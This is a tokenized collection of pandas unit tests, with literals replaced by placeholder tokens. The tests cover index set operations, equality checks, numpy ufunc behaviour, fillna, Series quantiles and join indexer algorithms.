union ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> result = first . union ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , everything ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . union ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_difference_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> first = idx [ <NUM_LIT:2> : ] <EOL> second = idx [ : <NUM_LIT:4> ] <EOL> answer = idx [ <NUM_LIT:4> : ] <EOL> result = first . difference ( second ) <EOL> if isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . difference ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> elif isinstance ( idx , ( DatetimeIndex , TimedeltaIndex ) ) : <EOL> self . assertEqual ( result . __class__ , answer . __class__ ) <EOL> tm . assert_numpy_array_equal ( result . asi8 , answer . asi8 ) <EOL> else : <EOL> result = first . difference ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . difference ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_symmetric_difference ( self ) : <EOL> for name , idx in compat . iteritems ( self . 
indices ) : <EOL> first = idx [ <NUM_LIT:1> : ] <EOL> second = idx [ : - <NUM_LIT:1> ] <EOL> if isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> answer = idx [ [ <NUM_LIT:0> , - <NUM_LIT:1> ] ] <EOL> result = first . symmetric_difference ( second ) <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> cases = [ klass ( second . values ) <EOL> for klass in [ np . array , Series , list ] ] <EOL> for case in cases : <EOL> if isinstance ( idx , PeriodIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> result = first . symmetric_difference ( case ) <EOL> elif isinstance ( idx , CategoricalIndex ) : <EOL> pass <EOL> else : <EOL> result = first . symmetric_difference ( case ) <EOL> self . assertTrue ( tm . equalContents ( result , answer ) ) <EOL> if isinstance ( idx , MultiIndex ) : <EOL> msg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( TypeError , msg ) : <EOL> result = first . symmetric_difference ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> with tm . assert_produces_warning ( FutureWarning ) : <EOL> first . sym_diff ( second ) <EOL> def test_insert_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> result = idx [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> if not len ( idx ) : <EOL> continue <EOL> self . assertTrue ( idx [ <NUM_LIT:0> : <NUM_LIT:4> ] . equals ( result . insert ( <NUM_LIT:0> , idx [ <NUM_LIT:0> ] ) ) ) <EOL> def test_delete_base ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> if not len ( idx ) : <EOL> continue <EOL> if isinstance ( idx , RangeIndex ) : <EOL> continue <EOL> expected = idx [ <NUM_LIT:1> : ] <EOL> result = idx . delete ( <NUM_LIT:0> ) <EOL> self . assertTrue ( result . equals ( expected ) ) <EOL> self . assertEqual ( result . name , expected . name ) <EOL> expected = idx [ : - <NUM_LIT:1> ] <EOL> result = idx . delete ( - <NUM_LIT:1> ) <EOL> self . assertTrue ( result . 
equals ( expected ) ) <EOL> self . assertEqual ( result . name , expected . name ) <EOL> with tm . assertRaises ( ( IndexError , ValueError ) ) : <EOL> result = idx . delete ( len ( idx ) ) <EOL> def test_equals_op ( self ) : <EOL> index_a = self . create_index ( ) <EOL> if isinstance ( index_a , PeriodIndex ) : <EOL> return <EOL> n = len ( index_a ) <EOL> index_b = index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> index_c = index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] . append ( index_a [ - <NUM_LIT:2> : - <NUM_LIT:1> ] ) <EOL> index_d = index_a [ <NUM_LIT:0> : <NUM_LIT:1> ] <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == index_b <EOL> expected1 = np . array ( [ True ] * n ) <EOL> expected2 = np . array ( [ True ] * ( n - <NUM_LIT:1> ) + [ False ] ) <EOL> tm . assert_numpy_array_equal ( index_a == index_a , expected1 ) <EOL> tm . assert_numpy_array_equal ( index_a == index_c , expected2 ) <EOL> array_a = np . array ( index_a ) <EOL> array_b = np . array ( index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> array_c = np . array ( index_a [ <NUM_LIT:0> : - <NUM_LIT:1> ] . append ( index_a [ - <NUM_LIT:2> : - <NUM_LIT:1> ] ) ) <EOL> array_d = np . array ( index_a [ <NUM_LIT:0> : <NUM_LIT:1> ] ) <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == array_b <EOL> tm . assert_numpy_array_equal ( index_a == array_a , expected1 ) <EOL> tm . assert_numpy_array_equal ( index_a == array_c , expected2 ) <EOL> series_a = Series ( array_a ) <EOL> series_b = Series ( array_b ) <EOL> series_c = Series ( array_c ) <EOL> series_d = Series ( array_d ) <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == series_b <EOL> tm . assert_numpy_array_equal ( index_a == series_a , expected1 ) <EOL> tm . assert_numpy_array_equal ( index_a == series_c , expected2 ) <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == index_d <EOL> with tm . 
assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == series_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> index_a == array_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> series_a == series_d <EOL> with tm . assertRaisesRegexp ( ValueError , "<STR_LIT>" ) : <EOL> series_a == array_d <EOL> if not isinstance ( index_a , MultiIndex ) : <EOL> expected3 = np . array ( [ False ] * ( len ( index_a ) - <NUM_LIT:2> ) + [ True , False ] ) <EOL> item = index_a [ - <NUM_LIT:2> ] <EOL> tm . assert_numpy_array_equal ( index_a == item , expected3 ) <EOL> tm . assert_numpy_array_equal ( series_a == item , expected3 ) <EOL> def test_numpy_ufuncs ( self ) : <EOL> for name , idx in compat . iteritems ( self . indices ) : <EOL> for func in [ np . exp , np . exp2 , np . expm1 , np . log , np . log2 , np . log10 , <EOL> np . log1p , np . sqrt , np . sin , np . cos , np . tan , np . arcsin , <EOL> np . arccos , np . arctan , np . sinh , np . cosh , np . tanh , <EOL> np . arcsinh , np . arccosh , np . arctanh , np . deg2rad , <EOL> np . rad2deg ] : <EOL> if isinstance ( idx , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> elif isinstance ( idx , ( Float64Index , Int64Index ) ) : <EOL> result = func ( idx ) <EOL> exp = Index ( func ( idx . values ) , name = idx . name ) <EOL> self . assert_index_equal ( result , exp ) <EOL> self . assertIsInstance ( result , pd . Float64Index ) <EOL> else : <EOL> if len ( idx ) == <NUM_LIT:0> : <EOL> continue <EOL> else : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> for func in [ np . isfinite , np . isinf , np . isnan , np . signbit ] : <EOL> if isinstance ( idx , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> elif isinstance ( idx , ( Float64Index , Int64Index ) ) : <EOL> result = func ( idx ) <EOL> exp = func ( idx . 
values ) <EOL> self . assertIsInstance ( result , np . ndarray ) <EOL> tm . assertNotIsInstance ( result , Index ) <EOL> else : <EOL> if len ( idx ) == <NUM_LIT:0> : <EOL> continue <EOL> else : <EOL> with tm . assertRaises ( Exception ) : <EOL> func ( idx ) <EOL> def test_hasnans_isnans ( self ) : <EOL> for name , index in self . indices . items ( ) : <EOL> if isinstance ( index , MultiIndex ) : <EOL> pass <EOL> else : <EOL> idx = index . copy ( ) <EOL> expected = np . array ( [ False ] * len ( idx ) , dtype = bool ) <EOL> self . assert_numpy_array_equal ( idx . _isnan , expected ) <EOL> self . assertFalse ( idx . hasnans ) <EOL> idx = index . copy ( ) <EOL> values = idx . values <EOL> if len ( index ) == <NUM_LIT:0> : <EOL> continue <EOL> elif isinstance ( index , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> values [ <NUM_LIT:1> ] = pd . tslib . iNaT <EOL> elif isinstance ( index , Int64Index ) : <EOL> continue <EOL> else : <EOL> values [ <NUM_LIT:1> ] = np . nan <EOL> if isinstance ( index , PeriodIndex ) : <EOL> idx = index . __class__ ( values , freq = index . freq ) <EOL> else : <EOL> idx = index . __class__ ( values ) <EOL> expected = np . array ( [ False ] * len ( idx ) , dtype = bool ) <EOL> expected [ <NUM_LIT:1> ] = True <EOL> self . assert_numpy_array_equal ( idx . _isnan , expected ) <EOL> self . assertTrue ( idx . hasnans ) <EOL> def test_fillna ( self ) : <EOL> for name , index in self . indices . items ( ) : <EOL> if len ( index ) == <NUM_LIT:0> : <EOL> pass <EOL> elif isinstance ( index , MultiIndex ) : <EOL> idx = index . copy ( ) <EOL> msg = "<STR_LIT>" <EOL> with self . assertRaisesRegexp ( NotImplementedError , msg ) : <EOL> idx . fillna ( idx [ <NUM_LIT:0> ] ) <EOL> else : <EOL> idx = index . copy ( ) <EOL> result = idx . fillna ( idx [ <NUM_LIT:0> ] ) <EOL> self . assert_index_equal ( result , idx ) <EOL> self . assertFalse ( result is idx ) <EOL> msg = "<STR_LIT>" <EOL> with self . assertRaisesRegexp ( TypeError , msg ) : <EOL> idx . 
fillna ( [ idx [ <NUM_LIT:0> ] ] ) <EOL> idx = index . copy ( ) <EOL> values = idx . values <EOL> if isinstance ( index , pd . tseries . base . DatetimeIndexOpsMixin ) : <EOL> values [ <NUM_LIT:1> ] = pd . tslib . iNaT <EOL> elif isinstance ( index , Int64Index ) : <EOL> continue <EOL> else : <EOL> values [ <NUM_LIT:1> ] = np . nan <EOL> if isinstance ( index , PeriodIndex ) : <EOL> idx = index . __class__ ( values , freq = index . freq ) <EOL> else : <EOL> idx = index . __class__ ( values ) <EOL> expected = np . array ( [ False ] * len ( idx ) , dtype = bool ) <EOL> expected [ <NUM_LIT:1> ] = True <EOL> self . assert_numpy_array_equal ( idx . _isnan , expected ) <EOL> self . assertTrue ( idx . hasnans ) </s>
<s> import nose <EOL> import numpy as np <EOL> import pandas as pd <EOL> from pandas import ( Index , Series , _np_version_under1p9 ) <EOL> from pandas . tseries . index import Timestamp <EOL> import pandas . core . common as com <EOL> import pandas . util . testing as tm <EOL> from . common import TestData <EOL> class TestSeriesQuantile ( TestData , tm . TestCase ) : <EOL> def test_quantile ( self ) : <EOL> from numpy import percentile <EOL> q = self . ts . quantile ( <NUM_LIT:0.1> ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> q = self . ts . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT> ) ) <EOL> q = Series ( self . ts , dtype = object ) . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT> ) ) <EOL> dts = self . ts . index . to_series ( ) <EOL> q = dts . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , Timestamp ( '<STR_LIT>' ) ) <EOL> tds = dts . diff ( ) <EOL> q = tds . quantile ( <NUM_LIT> ) <EOL> self . assertEqual ( q , pd . to_timedelta ( '<STR_LIT>' ) ) <EOL> result = Series ( [ np . timedelta64 ( '<STR_LIT>' ) ] ) . sum ( ) <EOL> self . assertTrue ( result is pd . NaT ) <EOL> msg = '<STR_LIT>' <EOL> for invalid in [ - <NUM_LIT:1> , <NUM_LIT:2> , [ <NUM_LIT:0.5> , - <NUM_LIT:1> ] , [ <NUM_LIT:0.5> , <NUM_LIT:2> ] ] : <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> self . ts . quantile ( invalid ) <EOL> def test_quantile_multi ( self ) : <EOL> from numpy import percentile <EOL> qs = [ <NUM_LIT> , <NUM_LIT> ] <EOL> result = self . ts . quantile ( qs ) <EOL> expected = pd . Series ( [ percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) , <EOL> percentile ( self . ts . valid ( ) , <NUM_LIT> ) ] , <EOL> index = qs , name = self . ts . name ) <EOL> tm . assert_series_equal ( result , expected ) <EOL> dts = self . ts . index . to_series ( ) <EOL> dts . name = '<STR_LIT>' <EOL> result = dts . 
quantile ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> expected = Series ( [ Timestamp ( '<STR_LIT>' ) , <EOL> Timestamp ( '<STR_LIT>' ) ] , <EOL> index = [ <NUM_LIT> , <NUM_LIT> ] , name = '<STR_LIT>' ) <EOL> tm . assert_series_equal ( result , expected ) <EOL> result = self . ts . quantile ( [ ] ) <EOL> expected = pd . Series ( [ ] , name = self . ts . name , index = Index ( <EOL> [ ] , dtype = float ) ) <EOL> tm . assert_series_equal ( result , expected ) <EOL> def test_quantile_interpolation ( self ) : <EOL> if _np_version_under1p9 : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> from numpy import percentile <EOL> q = self . ts . quantile ( <NUM_LIT:0.1> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> q1 = self . ts . quantile ( <NUM_LIT:0.1> ) <EOL> self . assertEqual ( q1 , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> self . assertEqual ( q , q1 ) <EOL> def test_quantile_interpolation_dtype ( self ) : <EOL> if _np_version_under1p9 : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> from numpy import percentile <EOL> q = pd . Series ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) . quantile ( <NUM_LIT:0.5> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , <NUM_LIT:50> ) ) <EOL> self . assertTrue ( com . is_integer ( q ) ) <EOL> q = pd . Series ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) . quantile ( <NUM_LIT:0.5> , interpolation = '<STR_LIT>' ) <EOL> self . assertEqual ( q , percentile ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , <NUM_LIT:50> ) ) <EOL> self . assertTrue ( com . is_integer ( q ) ) <EOL> def test_quantile_interpolation_np_lt_1p9 ( self ) : <EOL> if not _np_version_under1p9 : <EOL> raise nose . SkipTest ( "<STR_LIT>" ) <EOL> from numpy import percentile <EOL> q = self . ts . quantile ( <NUM_LIT:0.1> , interpolation = '<STR_LIT>' ) <EOL> self . 
assertEqual ( q , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> q1 = self . ts . quantile ( <NUM_LIT:0.1> ) <EOL> self . assertEqual ( q1 , percentile ( self . ts . valid ( ) , <NUM_LIT:10> ) ) <EOL> expErrMsg = "<STR_LIT>" <EOL> with tm . assertRaisesRegexp ( ValueError , expErrMsg ) : <EOL> self . ts . quantile ( <NUM_LIT> , interpolation = '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( ValueError , expErrMsg ) : <EOL> q = Series ( self . ts , dtype = object ) . quantile ( <NUM_LIT> , <EOL> interpolation = '<STR_LIT>' ) <EOL> def test_quantile_nan ( self ) : <EOL> cases = [ Series ( [ ] ) , Series ( [ np . nan , np . nan ] ) ] <EOL> for s in cases : <EOL> res = s . quantile ( <NUM_LIT:0.5> ) <EOL> self . assertTrue ( np . isnan ( res ) ) <EOL> res = s . quantile ( [ <NUM_LIT:0.5> ] ) <EOL> tm . assert_series_equal ( res , pd . Series ( [ np . nan ] , index = [ <NUM_LIT:0.5> ] ) ) <EOL> res = s . quantile ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> tm . assert_series_equal ( res , pd . Series ( [ np . nan , np . nan ] , <EOL> index = [ <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> def test_quantile_box ( self ) : <EOL> cases = [ [ pd . Timestamp ( '<STR_LIT>' ) , pd . Timestamp ( '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' ) ] , <EOL> [ pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) ] , <EOL> [ pd . Timedelta ( '<STR_LIT>' ) , pd . Timedelta ( '<STR_LIT>' ) , <EOL> pd . Timedelta ( '<STR_LIT>' ) ] , <EOL> [ pd . Timestamp ( '<STR_LIT>' ) , pd . Timestamp ( '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' ) , pd . NaT ] , <EOL> [ pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , <EOL> pd . Timestamp ( '<STR_LIT>' , tz = '<STR_LIT>' ) , pd . NaT ] , <EOL> [ pd . Timedelta ( '<STR_LIT>' ) , pd . Timedelta ( '<STR_LIT>' ) , <EOL> pd . Timedelta ( '<STR_LIT>' ) , pd . 
NaT ] ] <EOL> for case in cases : <EOL> s = pd . Series ( case , name = '<STR_LIT>' ) <EOL> res = s . quantile ( <NUM_LIT:0.5> ) <EOL> self . assertEqual ( res , case [ <NUM_LIT:1> ] ) <EOL> res = s . quantile ( [ <NUM_LIT:0.5> ] ) <EOL> exp = pd . Series ( [ case [ <NUM_LIT:1> ] ] , index = [ <NUM_LIT:0.5> ] , name = '<STR_LIT>' ) <EOL> tm . assert_series_equal ( res , exp ) <EOL> def test_datetime_timedelta_quantiles ( self ) : <EOL> self . assertTrue ( pd . isnull ( Series ( [ ] , dtype = '<STR_LIT>' ) . quantile ( <NUM_LIT> ) ) ) <EOL> self . assertTrue ( pd . isnull ( Series ( [ ] , dtype = '<STR_LIT>' ) . quantile ( <NUM_LIT> ) ) ) <EOL> def test_quantile_nat ( self ) : <EOL> res = Series ( [ pd . NaT , pd . NaT ] ) . quantile ( <NUM_LIT:0.5> ) <EOL> self . assertTrue ( res is pd . NaT ) <EOL> res = Series ( [ pd . NaT , pd . NaT ] ) . quantile ( [ <NUM_LIT:0.5> ] ) <EOL> tm . assert_series_equal ( res , pd . Series ( [ pd . NaT ] , index = [ <NUM_LIT:0.5> ] ) ) </s>
<s> from numpy import nan <EOL> import numpy as np <EOL> from pandas import Index , isnull , Timestamp <EOL> from pandas . util . testing import assert_almost_equal <EOL> import pandas . util . testing as tm <EOL> from pandas . compat import range , lrange , zip <EOL> import pandas . lib as lib <EOL> import pandas . _period as period <EOL> import pandas . algos as algos <EOL> from pandas . core import common as com <EOL> import datetime <EOL> class TestTseriesUtil ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def test_combineFunc ( self ) : <EOL> pass <EOL> def test_reindex ( self ) : <EOL> pass <EOL> def test_isnull ( self ) : <EOL> pass <EOL> def test_groupby ( self ) : <EOL> pass <EOL> def test_groupby_withnull ( self ) : <EOL> pass <EOL> def test_backfill ( self ) : <EOL> old = Index ( [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:12> ) ) <EOL> filler = algos . backfill_int64 ( old . values , new . values ) <EOL> expect_filler = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , - <NUM_LIT:1> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> old = Index ( [ <NUM_LIT:1> , <NUM_LIT:4> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:5> , <NUM_LIT:10> ) ) <EOL> filler = algos . backfill_int64 ( old . values , new . values ) <EOL> expect_filler = [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> def test_pad ( self ) : <EOL> old = Index ( [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:12> ) ) <EOL> filler = algos . pad_int64 ( old . values , new . 
values ) <EOL> expect_filler = [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> old = Index ( [ <NUM_LIT:5> , <NUM_LIT:10> ] ) <EOL> new = Index ( lrange ( <NUM_LIT:5> ) ) <EOL> filler = algos . pad_int64 ( old . values , new . values ) <EOL> expect_filler = [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> self . assert_numpy_array_equal ( filler , expect_filler ) <EOL> def test_left_join_indexer_unique ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> result = algos . left_join_indexer_unique_int64 ( b , a ) <EOL> expected = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> ] , dtype = np . int64 ) <EOL> assert ( np . array_equal ( result , expected ) ) <EOL> def test_left_outer_join_bug ( ) : <EOL> left = np . 
array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:3> , <EOL> <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:1> , <EOL> <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> , <EOL> <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <EOL> <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <EOL> <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> ] , dtype = np . int64 ) <EOL> right = np . array ( [ <NUM_LIT:3> , <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> max_groups = <NUM_LIT:4> <EOL> lidx , ridx = algos . left_outer_join ( left , right , max_groups , sort = False ) <EOL> exp_lidx = np . arange ( len ( left ) ) <EOL> exp_ridx = - np . ones ( len ( left ) ) <EOL> exp_ridx [ left == <NUM_LIT:1> ] = <NUM_LIT:1> <EOL> exp_ridx [ left == <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> assert ( np . array_equal ( lidx , exp_lidx ) ) <EOL> assert ( np . 
array_equal ( ridx , exp_ridx ) ) <EOL> def test_inner_join_indexer ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . inner_join_indexer_int64 ( a , b ) <EOL> index_exp = np . array ( [ <NUM_LIT:3> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( index , index_exp ) <EOL> aexp = np . array ( [ <NUM_LIT:2> , <NUM_LIT:4> ] ) <EOL> bexp = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> assert_almost_equal ( ares , aexp ) <EOL> assert_almost_equal ( bres , bexp ) <EOL> a = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . inner_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , [ <NUM_LIT:5> ] ) <EOL> assert_almost_equal ( ares , [ <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( bres , [ <NUM_LIT:0> ] ) <EOL> def test_outer_join_indexer ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . outer_join_indexer_int64 ( a , b ) <EOL> index_exp = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> assert_almost_equal ( index , index_exp ) <EOL> aexp = np . array ( [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , dtype = np . int64 ) <EOL> bexp = np . 
array ( [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_almost_equal ( ares , aexp ) <EOL> assert_almost_equal ( bres , bexp ) <EOL> a = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . outer_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , [ <NUM_LIT:5> ] ) <EOL> assert_almost_equal ( ares , [ <NUM_LIT:0> ] ) <EOL> assert_almost_equal ( bres , [ <NUM_LIT:0> ] ) <EOL> def test_left_join_indexer ( ) : <EOL> a = np . array ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . int64 ) <EOL> b = np . array ( [ <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , dtype = np . int64 ) <EOL> index , ares , bres = algos . left_join_indexer_int64 ( a , b ) <EOL> assert_almost_equal ( index , a ) <EOL> aexp = np . array ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> 